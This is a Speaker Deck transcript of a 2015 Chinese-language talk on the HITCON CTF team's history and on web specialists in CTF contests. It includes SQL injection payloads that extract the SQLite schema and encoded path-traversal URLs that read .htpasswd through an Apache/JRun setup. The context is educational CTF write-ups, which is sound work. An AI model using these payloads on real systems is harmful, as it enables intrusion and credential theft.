Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
Search
Orange
July 18, 2015
Technology
6
13k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
2015 烏雲峰會演講投影片
Orange
July 18, 2015
Tweet
Share
More Decks by Orange
See All by Orange
Best Practices - The Upload
p8361
0
71
Security in PHP 那些在滲透測試的小技巧
p8361
0
140
網頁安全 Web Security 入門
p8361
0
140
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
p8361
13
36k
那些 Web Hacking 中的奇技淫巧
p8361
16
14k
PHPConf 2013 - 矛盾大對決
p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
p8361
15
12k
駭客看 Django
p8361
25
13k
Other Decks in Technology
See All in Technology
Oracle Cloud Infrastructure:2025年6月度サービス・アップデート
oracle4engineer
PRO
1
140
活きてなかったデータを活かしてみた話 / Shirokane Kougyou vol 19
sansan_randd
1
400
BrainPadプログラミングコンテスト記念LT会2025_社内イベント&問題解説
brainpadpr
0
150
Liquid Glass革新とSwiftUI/UIKit進化
fumiyasac0921
0
110
白金鉱業Meetup_Vol.19_PoCはデモで語れ!顧客の本音とインサイトを引き出すソリューション構築
brainpadpr
2
470
Amplifyとゼロからはじめた AIコーディング 成果と展望
mkdev10
1
360
IIWレポートからみるID業界で話題のMCP
fujie
0
700
A2Aのクライアントを自作する
rynsuke
1
150
AIの最新技術&テーマをつまんで紹介&フリートークするシリーズ #1 量子機械学習の入門
tkhresk
0
120
25分で解説する「最小権限の原則」を実現するための AWS「ポリシー」大全
opelab
9
2.1k
UIテスト自動化サポート- Testbed for XCUIAutomation practice
notoroid
0
100
20250625 Snowflake Summit 2025活用事例 レポート / Nowcast Snowflake Summit 2025 Case Study Report
kkuv
1
170
Featured
See All Featured
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
507
140k
For a Future-Friendly Web
brad_frost
179
9.8k
Stop Working from a Prison Cell
hatefulcrawdad
270
20k
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
10
920
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
32
2.3k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
26
2.8k
Agile that works and the tools we love
rasmusluckow
329
21k
Site-Speed That Sticks
csswizardry
10
650
A Tale of Four Properties
chriscoyier
159
23k
Unsuck your backbone
ammeep
671
58k
Done Done
chrislema
184
16k
Building Applications with DynamoDB
mza
95
6.5k
Transcript
關於 HITCON CTF 的那些事 Web 狗如何在險惡的 CTF 世界中存活?
[email protected]
之
About Me • 蔡政達 a.k.a Orange • CHROOT 成員 /
HITCON 成員 • 國內外研討會 HITCON, AVTokyo, PHPConf 等講師 • 國內外駭客競賽 CTF 冠軍 • 揭露過 Microsoft IE, Django, Yahoo ... 等 0-DAY 漏洞 • 專精於駭客手法、Web Security 與網路滲透 #90後 #賽棍 #電競選手 #狗 #Web狗
None
About HITCON CTF Team • 台灣駭客年會 (Hacks in Taiwan Conference)
• 前身為 CHROOT 讀書會 • 目前比賽成員約 14 位,成員來自台灣各隊伍 • 過半數為學生
參與過賽事(決賽) • 中國 BCTF • 韓國 SECUINSIDE • 美國 DEF
CON • 馬來西亞 HITB • 日本 SECCON • 韓國 CODEGATE • 中國 0CTF • …
由三隻獨立隊伍所合併而成 HITCON
None
• DEFCON CTF 21 Quals • 217 首度接觸 CTF! 2013-05
• 中國百度 BCTF 決賽 • 首次參加的 Attack & Defense 比賽!
2014-05 2013-05
None
黑客競賽住宿飯店提供黑客蚊香片
• DEFCON CTF 22 Quals • 聚集各方戰力重新挑戰一次 • HITCON •
台灣大學 217 • 交通大學成員 2014-05 2013-05 2014-05
SICK http://www.jeffxx.com/blog/2014/05/19/defcon-ctf-22-qual-sick-writeup/
• 韓國 SECUINSIDE CTF 決賽 • 發現跟國外隊伍差距多大 2014-05 2013-05 2014-05
2014-07
None
DEF CON 22 CTF FINAL
• 首次聚集台灣最強戰力挑戰 DEFCON 決賽 • 抵達美國過程一波三折 2014-05 2013-05 2014-05 2014-07
2014-08
• 時差問題 • 食物只有漢堡王 • 設備 ? VLAN TAG 999
2014-05 2013-05 2014-05 2014-07 2014-08
None
None
None
• HITCON 舉辦首場開放世界報 名的比賽 - HITCON CTF • 列強環繞 -
Bamboo Fox 成立 2014-05 2013-05 2014-05 2014-07 2014-08 2014-08
http://ctf.hitcon.org/
• 日本 SECCON 決賽 • Kill of the Hill 賽制
• 看不懂規則以及網頁 • 花了兩個小時 Fuzzing Protocol 找到 Overflow 後... 原來有提供 Binary 2014-05 2013-05 2014-05 2014-07 2014-08 2014-08 2015-02
TO BE CONTINUED 2014-05 2013-05 2014-05 2014-07 2014-08 2014-08 2015-02
2015-??
「Web 狗如何在險惡的 CTF 世界中存活?」
DEFCON 22 CTF Quals Web x 1 of 21 DEFCON
23 CTF Quals Web x 1 of 24 Boston Key Party CTF 2015 Web x 0 of 31 PLAID CTF 2015 Web x 1 of 24 「Web 狗如何在險惡的 CTF 世界中存活?」
None
看到都快哭出來了
Web 為何弱勢? • 代碼數量 • 你不會為了出一道題目去寫幾十萬行代碼 • 技術 v.s. 思路
v.s. ...滲透? • 漏洞利用的藝術 • 想想假使 WordPress / Discuz 出了一個任意變量覆蓋要如何 優雅 的利用? • 跳個 alert 也是利用,遠端代碼執行也是利用
# login page r = query("SELECT pwd FROM users WHERE
user = '%s'" % username) if r.pwd == password: session['username'] = username # index page username = session['username'] r = query("SELECT point FROM users WHERE user = '%s'" % username) print r.point CodeGate CTF 2015 Final Web Pseudo Code
CodeGate CTF 2015 Final Web Pseudo Code • 4 /
10 隊伍解出 • 技術很簡單,成功登入後可以看到 session 對應的分數 • 不過在沒有原始碼狀況下難度增加 • 對於黑箱測試來說只有登入成功以及失敗的結果可知 Q: 在沒有錯誤、無法讀寫、無法多語句的前提下,如何用最快的方式 取得資料?
' UNION SELECT (SELECT CASE WHEN random()*2>1 THEN 'password' ELSE
(SELECT sql FROM sqlite_master limit 1) END)--+ 核心概念 - 單次輸入但構造出不同的結果
' UNION SELECT (SELECT CASE WHEN datetime('now')>'2015-06-22 00:00:00' THEN 'password'
ELSE (SELECT sql FROM sqlite_master limit 1) END)--+ 核心概念 - 單次輸入但構造出不同的結果
HITCON CTF 2014 Web LEENODE
• 2 / 1020 隊伍解出 • Web 分層架構漏洞 • ColdFusion
with Apache Connector • 舊版本 ColdFusion Double Encoding 造成資訊洩漏漏洞 • 同樣漏洞,出現兩種思路兩種解法 HITCON CTF 2014 Web LEENODE
<FilesMatch "^\.ht"> 會被 Apache 處理 使⽤用 Double Encoding 繞過 Apache
處理 .cfm 會被 JRun 處理 使⽤用 Null Byte 截斷 .cfm JRun 讀取 .htpasswd 原始碼並送回 /admin%252f%252ehtpasswd%2500.cfm
/.%5Cadmin%5C.htpasswd%253b.jsp <FilesMatch "^\.ht"> 會被 Apache 處理 使⽤用反斜線繞過 Apache 處理 .jsp
會被 JRun 處理 使⽤用 ; 截斷 .jsp JRun 讀取 .htpasswd 原始碼並送回
「Web 狗如何在險惡的 CTF 世界中存活?」 所以說
– 怎麼可能存活,想多了 「Web 狗如何在險惡的 CTF 世界中存活?」
– 為了存活下來,不得不強迫自己學其他技能 「Web 狗如何在險惡的 CTF 世界中存活?」
– 但是密碼學、堆棧溢出是高富帥的領域怎麼辦? 「Web 狗如何在險惡的 CTF 世界中存活?」
DAWN 隊伍專訪節錄
從用得上的實例學起 • Web Hacking • Reversing + Pwnable • /cgi-bin/
下的 ELF • 嵌入式設備總會遇到 • 滲透後主機提權要自己改 Exploit Code • Cryptography • Padding Oracle / Bit Flipping Attack / Length Extension Attack ...
– 人在江湖,身不由己 「Web 狗如何在險惡的 CTF 世界中存活?」
Web 狗額外優勢 • 網頁端的資訊洩漏 ( Flag ? ) • /server-status/
• /.git/ .DS_Store • 針對出題者的資訊蒐集? • 蒐集題目作者習慣 Code Snippet / Coding Style •還有哪些只有 Web 狗能做的事情?
結論
Q & A